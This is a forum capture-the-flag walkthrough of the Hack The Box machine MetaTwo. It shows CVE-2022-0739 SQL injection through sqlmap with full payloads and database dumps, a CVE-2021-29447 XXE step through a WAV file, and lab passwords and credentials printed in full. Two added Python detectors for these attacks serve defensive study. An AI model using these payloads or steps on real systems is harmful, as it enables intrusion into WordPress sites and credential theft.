[Original] HTB MetaTwo (easy)
Posted: 2022-12-4 00:41 | 951


Reference (original writeup): https://0xdedinfosec.vercel.app/blog/hackthebox-metatwo-writeup
Ports 21, 22 and 80 are open.
The site is at http://metapress.htb/.
With Wappalyzer installed you can see the site's technology stack.
Viewing the page source reveals the WordPress plugin information.
Look up vulnerabilities for that plugin version:
CVE-2022-0739
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
This CVE has a public PoC; following it, first find the _wpnonce value.
Capture the request with Burp and save it as admin.req.
Test the injection parameter in admin.req.

List all databases

List the tables in the blog database

Dump the wp_users table

Crack the password hash

Successfully cracked the password: partylikearockstar
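The same injection seen from the defender's side, as an added example that is not part of the original post or of the plugin's code: the vulnerable action only ever expects `category_id` and `total_service` as plain integers, so anything else in those fields is worth alerting on. The sample bodies are constructed from the request and the two sqlmap payloads shown on this page (the UNION hex string is shortened).

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

VULN_ACTION = "bookingpress_front_get_category_services"
# Parameters this action should only ever receive as plain integers.
INTEGER_PARAMS = ("category_id", "total_service")
# Generic injection indicators, matched against the decoded body.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    re.compile(r"--\s|/\*"),
]

def inspect_body(body: str) -> List[str]:
    """Return findings for one urlencoded admin-ajax POST body.
    An empty list means the request looks like normal plugin traffic."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action") != [VULN_ACTION]:
        return []  # only this action carried the unsanitised query
    findings = []
    for name in INTEGER_PARAMS:
        for value in fields.get(name, []):
            if not re.fullmatch(r"\d+", value):
                findings.append(f"{name}: non-integer value {value[:40]!r}")
    for pat in SQLI_PATTERNS:
        if pat.search(body):
            findings.append(f"body matches {pat.pattern!r}")
    return findings

# Constructed sample bodies: the legitimate request captured on this page
# and the two payloads sqlmap reported for it (UNION hex shortened).
PREFIX = f"action={VULN_ACTION}&_wpnonce=73608887bb&category_id=33&total_service="
SAMPLES: Dict[str, str] = {
    "clean": PREFIX + "1",
    "time_based": PREFIX + "1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557",
    "union": PREFIX + "1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b61,0x71786a7071),"
                      "NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -",
}

def scan_samples() -> Dict[str, List[str]]:
    """Run the check over every constructed sample."""
    return {name: inspect_body(body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:>10}: {findings or 'no findings'}")
```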

Run a directory scan
Log in to wp-admin with the manager account's credentials.
Look up the vulnerability for this WordPress version: CVE-2021-29447
https://tryhackme.com/room/wordpresscve202129447
We need to create a WAV file that fetches another file, dedsec.dtd, which contains our malicious payload.

Start a PHP server

We obtained /etc/passwd

Now let's fetch the WordPress wp-config.php file


We obtained the path /var/www/metapress.htb/blog
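An added example, not from the writeup or from WordPress: a scanner for the WAV construction behind CVE-2021-29447, in which the bundled getID3 parser read a file's iXML metadata chunk as XML with external entities enabled. Both WAV files are constructed in memory and the DTD host is a placeholder.

```python
import re
import struct
from typing import List, Tuple

# DTD markup that a broadcast-metadata chunk has no business carrying.
DANGEROUS_XML = re.compile(rb"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b", re.I)

def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE container."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even length

def wav_findings(data: bytes) -> List[str]:
    """Flag iXML chunks (the chunk getID3 parsed as XML) that declare or load
    entities; an empty list means the metadata is plain XML or absent."""
    return [f"{cid.decode()} chunk contains DTD/entity markup"
            for cid, payload in iter_riff_chunks(data)
            if cid == b"iXML" and DANGEROUS_XML.search(payload)]

def build_wav(extra_chunks: List[Tuple[bytes, bytes]]) -> bytes:
    """Constructed minimal WAV: a PCM 'fmt ' chunk plus the given chunks."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
    body = b"fmt " + struct.pack("<I", len(fmt)) + fmt
    for cid, payload in extra_chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        body += b"\0" * (len(payload) & 1)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body

# Constructed samples: ordinary broadcast metadata, and the CVE-2021-29447
# shape, an iXML chunk whose DOCTYPE points at an external DTD (placeholder host).
BENIGN_WAV = build_wav([(b"iXML", b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>")])
SUSPECT_WAV = build_wav([(b"iXML", b"<?xml version='1.0'?>"
                          b"<!DOCTYPE x SYSTEM 'http://dtd-host.example/dedsec.dtd'><x/>")])

if __name__ == "__main__":
    for label, wav in (("benign", BENIGN_WAV), ("suspect", SUSPECT_WAV)):
        print(label, wav_findings(wav) or "clean")
```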


FTP user
Username: metapress.htb
Password: 9NYS_ii@FyL_p5M2NvJ
Retrieved send_email.php; reading it gives the password for user jnelson: Cb4_JmWM8zUZWMu@Ys
ssh jnelson@10.10.11.186
Found passpie.
A Google search shows passpie is a command-line password manager written in Python: https://github.com/marcwebbie/passpie
Let's try to crack the key.
Download the key.

Keep only the private key.

Convert it to john format

Got the passphrase: blink182
Got the root password: p7qfAZt4_A1xo_0x
su root
cd ~
cat root.txt

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close
 
action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1
$ sqlmap -r admin.req -p total_service --batch
[*] starting @ 08:54:24 /2022-12-03/
 
[08:54:24] [INFO] parsing HTTP request from 'admin.req'
[08:54:25] [INFO] testing connection to the target URL
[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:54:29] [INFO] testing if the target URL content is stable
[08:54:30] [INFO] target URL content is stable
[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable
[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'
[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:04] [INFO] testing 'Generic inline queries'
[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                         
[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns
[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:13 /2022-12-03/
$ sqlmap -r admin.req -p total_service --dbs
[*] starting @ 08:56:32 /2022-12-03/
 
[08:56:32] [INFO] parsing HTTP request from 'admin.req'
[08:56:32] [INFO] resuming back-end DBMS 'mysql'
[08:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:33] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema
 
[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:34 /2022-12-03/
$ sqlmap -r admin.req -p total_service -D blog --tables
[*] starting @ 08:59:43 /2022-12-03/
 
[08:59:43] [INFO] parsing HTTP request from 'admin.req'
[08:59:43] [INFO] resuming back-end DBMS 'mysql'
[08:59:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:59:45] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+
 
[08:59:47] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:59:47 /2022-12-03/

Last edited by hml189 on 2022-12-29 14:29.